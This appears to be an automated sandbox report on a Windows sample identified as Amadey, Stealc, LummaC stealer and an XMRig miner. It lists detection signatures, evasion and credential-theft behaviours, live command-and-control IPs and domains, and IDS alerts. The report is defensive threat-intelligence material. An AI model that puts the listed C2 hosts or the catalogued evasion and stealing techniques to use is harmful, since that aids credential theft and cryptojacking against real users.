Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1572015
MD5: 520ee940832d8a70cef812a75401009c
SHA1: 83d76e5b100e044be166e1be2b30bf5f1eaf2332
SHA256: 536df3a39899dec8c749ef790bc7d55c8dc60052555c74fa2ed1f8518a2180eb
Tags: Amadeyexeuser-Bitsight
Infos:

Detection

Amadey, Credential Flusher, LummaC Stealer, Stealc, Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Creates multiple autostart registry keys
Drops password protected ZIP file
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Found strings related to Crypto-Mining
Hides threads from debuggers
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Uses ping.exe to check the status of other devices and networks
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Enables security privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
xmrig According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.206. Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/w) Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz:443/api//%ProgramFiles% Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/za Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/tes= Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe Avira: detection malicious, Label: HEUR/AGEN.1352802
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Avira: detection malicious, Label: HEUR/AGEN.1352802
Found malware configuration
Source: 00000001.00000002.1723431673.00000000002E1000.00000040.00000001.01000000.00000008.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 00000025.00000002.2719200023.00000000011DE000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: 847ee125a0.exe.2248.39.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["dwell-exclaim.biz", "dare-curbys.biz", "se-blurry.biz", "atten-supporse.biz", "print-vexer.biz", "formy-spill.biz", "impend-differ.biz", "covery-mover.biz", "zinc-sneark.biz"], "Build id": "LOGS11--LiveTraffic"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\C1J7SVw[1].exe ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\1013565001\06c8dc661c.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 57%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 57%
Source: file.exe Virustotal: Detection: 58% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.7% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1013565001\06c8dc661c.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 00000027.00000002.2988717863.0000000000631000.00000040.00000001.01000000.0000000F.sdmp String decryptor: impend-differ.biz
Source: 00000027.00000002.2988717863.0000000000631000.00000040.00000001.01000000.0000000F.sdmp String decryptor: print-vexer.biz
Source: 00000027.00000002.2988717863.0000000000631000.00000040.00000001.01000000.0000000F.sdmp String decryptor: dare-curbys.biz
Source: 00000027.00000002.2988717863.0000000000631000.00000040.00000001.01000000.0000000F.sdmp String decryptor: covery-mover.biz
Source: 00000027.00000002.2988717863.0000000000631000.00000040.00000001.01000000.0000000F.sdmp String decryptor: formy-spill.biz
Source: 00000027.00000002.2988717863.0000000000631000.00000040.00000001.01000000.0000000F.sdmp String decryptor: dwell-exclaim.biz
Source: 00000027.00000002.2988717863.0000000000631000.00000040.00000001.01000000.0000000F.sdmp String decryptor: zinc-sneark.biz
Source: 00000027.00000002.2988717863.0000000000631000.00000040.00000001.01000000.0000000F.sdmp String decryptor: se-blurry.biz
Source: 00000027.00000002.2988717863.0000000000631000.00000040.00000001.01000000.0000000F.sdmp String decryptor: atten-supporse.biz
Source: 00000027.00000002.2988717863.0000000000631000.00000040.00000001.01000000.0000000F.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000027.00000002.2988717863.0000000000631000.00000040.00000001.01000000.0000000F.sdmp String decryptor: TeslaBrowser/5.5
Source: 00000027.00000002.2988717863.0000000000631000.00000040.00000001.01000000.0000000F.sdmp String decryptor: - Screen Resoluton:
Source: 00000027.00000002.2988717863.0000000000631000.00000040.00000001.01000000.0000000F.sdmp String decryptor: - Physical Installed Memory:
Source: 00000027.00000002.2988717863.0000000000631000.00000040.00000001.01000000.0000000F.sdmp String decryptor: Workgroup: -
Source: 00000027.00000002.2988717863.0000000000631000.00000040.00000001.01000000.0000000F.sdmp String decryptor: LOGS11--LiveTraffic

Bitcoin Miner
barindex
Yara detected Xmrig cryptocurrency miner
Source: Yara match File source: 31.3.Intel_PTT_EK_Recertification.exe.269bde20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.3.Intel_PTT_EK_Recertification.exe.269bde20000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000020.00000002.2566924638.000000014040B000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.2565923861.0000000000658000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.2565923861.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.2565923861.000000000067B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.2566801065.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.2560394914.00000269BDE20000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Intel_PTT_EK_Recertification.exe PID: 3400, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 5344, type: MEMORYSTR
Found strings related to Crypto-Mining
Source: Intel_PTT_EK_Recertification.exe, 0000001F.00000003.2560394914.00000269BDE20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: stratum+tcp://
Source: Intel_PTT_EK_Recertification.exe, 0000001F.00000003.2560394914.00000269BDE20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: cryptonight/0
Source: Intel_PTT_EK_Recertification.exe, 0000001F.00000003.2560394914.00000269BDE20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: -o, --url=URL URL of mining server
Source: Intel_PTT_EK_Recertification.exe, 0000001F.00000003.2560394914.00000269BDE20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: stratum+tcp://
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49832 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49838 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49845 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49853 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49859 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49866 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49873 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49883 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49894 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49910 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49911 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49914 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49932 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49939 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49951 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49979 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49983 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49982 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:50011 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:50026 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:50033 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:50040 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:50048 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:50054 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:50077 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Code function: 7_2_0040367D GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime, 7_2_0040367D
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Code function: 7_2_004031DC FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z, 7_2_004031DC
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_005F7978 FindFirstFileW,FindFirstFileW,free, 12_2_005F7978
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_005F881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free, 12_2_005F881C
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\main\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\main\extracted Jump to behavior
Source: firefox.exe Memory has grown: Private usage: 1MB later: 212MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49758 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49764
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49796 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057921 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz) : 192.168.2.4:64408 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49815 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49819 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49822 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49832 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49838 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49845 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49844 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49846 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49853 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49859 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49873 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49865 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49866 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49883 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49894 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49893 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49901 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49910 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49939 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49951 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:50011 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:50026 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:50033 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:50040 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:50048 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:50054 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:50077 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50041 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49932 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49815 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49815 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49859 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49873 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49873 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49866 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49866 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49822 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49822 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49951 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50011 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50011 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50026 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50026 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50033 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50077 -> 104.21.32.1:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor URLs: dwell-exclaim.biz
Source: Malware configuration extractor URLs: dare-curbys.biz
Source: Malware configuration extractor URLs: se-blurry.biz
Source: Malware configuration extractor URLs: atten-supporse.biz
Source: Malware configuration extractor URLs: print-vexer.biz
Source: Malware configuration extractor URLs: formy-spill.biz
Source: Malware configuration extractor URLs: impend-differ.biz
Source: Malware configuration extractor URLs: covery-mover.biz
Source: Malware configuration extractor URLs: zinc-sneark.biz
Source: Malware configuration extractor IPs: 185.215.113.43
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Connects to many different domains
Source: unknown Network traffic detected: DNS query count 32
Downloads executable code via HTTP
